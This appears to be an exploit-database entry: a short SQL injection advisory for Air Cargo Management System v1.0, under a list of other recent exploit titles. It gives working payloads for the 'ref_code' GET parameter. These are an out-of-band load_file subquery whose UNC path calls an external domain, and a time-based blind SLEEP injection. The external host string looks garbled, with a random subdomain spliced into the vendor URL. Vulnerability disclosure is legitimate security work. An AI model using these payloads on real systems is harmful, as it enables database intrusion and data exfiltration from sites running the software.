
9 changes to exploits/shellcodes Adobe ColdFusion 11 - LDAP Java Object Deserialization Remode Code Execution (RCE) ICL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 - Remote File CRUD Simple Real Estate Portal System 1.0 - 'id' SQLi Air Cargo Management System v1.0 - SQLi aaPanel 6.8.21 - Directory Traversal (Authenticated) Student Record System 1.0 - 'cid' SQLi (Authenticated) WebHMI 4.1.1 - Remote Code Execution (RCE) (Authenticated) WebHMI 4.1 - Stored Cross Site Scripting (XSS) (Authenticated) Microweber CMS 1.2.10 - Local File Inclusion (Authenticated) (Metasploit)
33 lines
No EOL
1.5 KiB
Text
33 lines
No EOL
1.5 KiB
Text
# Title: Air Cargo Management System v1.0 - SQLi
|
|
# Author: nu11secur1ty
|
|
# Date: 02.18.2022
|
|
# Vendor: https://www.sourcecodester.com/users/tips23
|
|
# Software: https://www.sourcecodester.com/php/15188/air-cargo-management-system-php-oop-free-source-code.html
|
|
# Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/oretnom23/2022/Air-Cargo-Management-System
|
|
|
|
# Description:
|
|
The `ref_code` parameter from Air Cargo Management System v1.0 appears
|
|
to be vulnerable to SQL injection attacks.
|
|
The payload '+(select
|
|
load_file('\\\\c5idmpdvfkqycmiqwv299ljz1q7jvej5mtdg44t.https://www.sourcecodester.com/php/15188/air-cargo-management-system-php-oop-free-source-code.html\\hag'))+'
|
|
was submitted in the ref_code parameter.
|
|
This payload injects a SQL sub-query that calls MySQL's load_file
|
|
function with a UNC file path that references a URL on an external
|
|
domain.
|
|
The application interacted with that domain, indicating that the
|
|
injected SQL query was executed.
|
|
WARNING: If this is in some external domain, or some subdomain
|
|
redirection, or internal whatever, this will be extremely dangerous!
|
|
Status: CRITICAL
|
|
|
|
|
|
[+] Payloads:
|
|
|
|
---
|
|
Parameter: ref_code (GET)
|
|
Type: time-based blind
|
|
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
|
|
Payload: p=trace&ref_code=258044'+(select
|
|
load_file('\\\\c5idmpdvfkqycmiqwv299ljz1q7jvej5mtdg44t.https://www.sourcecodester.com/php/15188/air-cargo-management-system-php-oop-free-source-code.html\\hag'))+''
|
|
AND (SELECT 9012 FROM (SELECT(SLEEP(3)))xEdD) AND 'JVki'='JVki
|
|
--- |